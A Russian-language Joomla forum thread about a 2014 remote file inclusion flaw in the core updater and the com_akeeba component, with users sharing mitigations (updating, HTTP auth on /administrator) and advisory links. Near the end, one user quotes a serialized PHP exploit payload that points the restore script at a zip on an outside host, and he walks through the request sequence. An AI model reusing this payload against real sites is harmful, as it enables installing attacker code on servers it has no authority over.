0 Пользователей и 1 Гость просматривают эту тему.
  • 17 Ответов
  • 2269 Просмотров
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
*

Taatshi

  • Глобальный модератор
  • 5259
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Войдите или зарегистрируйтесь. Сюда нельзя в двух словах написать? Нет ни малейшего желания регаться на таком вырвиглазном ресурсе.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
ммм... кнопка "принять условия"
*

Taatshi

  • Глобальный модератор
  • 5259
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Да принято. Не помогло ) Или я полностью потеряла ориентацию, что неудивительно)

Ну да ладно. Разберемся и без них.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Потом закрыть баблозапрашиватель. Или я просто везучий. Может у них разные страницы для посетителей.
*

stepan39

  • Захожу иногда
  • 497
  • 27 / 0
Потом закрыть баблозапрашиватель. Или я просто везучий. Может у них разные страницы для посетителей.
Я спокойно почитал в такой же последовательности (Москва).
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Уязвимость кстати отработала и с securitycheck. Я не сильно в этом спец (не команда хакреов), но похоже плагины защиты не помогут. Разве что защита на уровне ПО сервера.
*

stepan39

  • Захожу иногда
  • 497
  • 27 / 0
... Сюда нельзя в двух словах написать? ...
Joomla Core version 3.3.0 have suffers from a remote SQL injection vulnerability and upload shell.

butcho
06/08/2014 в 12:36
3.3.3 vulnerable to attack?

Администратор
10/08/2014 в 13:09
@butcho yes!

Выше версию, я так понимаю не ломают.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Еще один повод закрывать папку /administrator , от доступа по IP, http авторизацией
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
На этом сайте были расширения, которые что-то из админки тянули.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
update в последних версиях закрывали, что самой akeba, что самого движка
update(akeba=движка)
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
http://ru.1337day.com/exploits/22233

Спойлер
[свернуть]

Спасибо за бдительность, не уследил по первому случию:
идет код такой
Спойлер
[свернуть]

во втором такой
Спойлер
[свернуть]

а те кто понимают процессы подобных вещей и программирование в области PHP, смогут самостоятельно сделать патчи которые уменшат риск проникновения!
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
P.S: так это уязвимость не в Joomla, а в компоненте com_akeeba, вот уже обсуждалось http://joomlaforum.ru/index.php/topic,301641.0.html, лекарство обновить akeeba!

кому интересно вот описание работы exploita http://www.exploit-db.com/exploits/35033/ разумеется в образовательных целях
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
P.S: так это уязвимость не в Joomla, а в компоненте com_akeeba, вот уже обсуждалось http://joomlaforum.ru/index.php/topic,301641.0.html, лекарство обновить akeeba!

кому интересно вот описание работы exploita http://www.exploit-db.com/exploits/35033/ разумеется в образовательных целях
правильно, но уязвимость в движке тоже, разработчик com_akeeba является создателем update, которое разработчики движка официально используют для авто обновлений самого движка и расширений в админке

P.S: как раньше писал нельзя использовать сторонние расширения и авто обновления, это полностью противоречит безопасности, но разработчики сами эти оба правила нарушили в комплексе по полной программе, и теперь постоянно будет что то появляться, если сами владельцы сайтов не будут закрывать на уровне сервера эти возможности
« Последнее редактирование: 22.11.2014, 12:07:57 от flyingspook »
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Короче вот так оно. Пока не поломали, надо обновлять все. И поменьше личных хаков, если не сильно разбираетесь.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
вообщем всю ночь сегодня тестил эту уязвимость, для тех у кого нет возможности обновиться по каким либо не понятным причинам, достаточно на админку наложить бейсик авторизацию, второй момент, эксплоит срабатывает только в том случае если присутствует в наличии файл restoration.php!
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
эта уязвимость срабатывает только во время восстановления архива
Цитировать
(только в том случае если присутствует в наличии файл restoration.php!)
и при некоторых др.условиях.

Описание и фикс:
http://vel.joomla.org/jsn/1501-20140903-core-remote-file-inclusion.html
https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
все верно! из начальна когда админ делал какие либо манипуляции, в папке /administrator/components/com_joomlaupdate/ создается файл restoration.php который генерирует ключь для параметра kickstart.security.password в результате сделав запрос в закодированном виде:
Цитировать
O:9:"AKFactory":1:{s:18:"AKFactoryvarlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:40:"http://dale1vuelta.com/media/wt5121n.zip";}}
он возрощает JSON масив в параметре которого указаны дальнейшие инструкции для установки, повторным зопросом с полученым параметром factory мы говорим скрипту что будем устанавливаться, согласно полученным инструкциям, в противном случае при отсутствие файла restoration.php, который генерирует ключь для kickstart.security.passwor, выдаст масив JSON с ошибкой
Цитировать
{"status":false,"message":"Invalid login"}
также есть еще отдельные факторы которые могут повлиять на благополучную и не благополучную реализацию, но это уже отдельная история....
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 926
Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 1101
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

Ответов: 5
Просмотров: 1366
Последний ответ 13.09.2021, 09:23:28
от Oleg+
Joomla 1.5 и 2.5 на одном хостинге

Автор andreU

Ответов: 28
Просмотров: 13105
Последний ответ 25.04.2021, 19:42:48
от rsn
Заражены файлы картинок движка Joomla 3

Автор krog

Ответов: 5
Просмотров: 1276
Последний ответ 16.04.2021, 08:16:45
от Taatshi